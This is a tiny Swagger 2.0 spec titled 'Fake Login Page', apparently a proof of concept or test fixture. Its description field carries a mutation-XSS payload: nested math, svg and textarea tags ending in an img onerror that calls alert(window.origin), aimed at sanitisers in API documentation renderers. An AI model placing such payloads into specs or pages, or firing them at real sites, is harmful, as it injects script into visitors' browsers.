swagger: '2.0'
info:
  version: 1.0.0
  title: Fake Login Page
  description: |
    <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(window.origin)'>">
paths:
  /:
    post:
      responses:
        '200':
          description: Login successful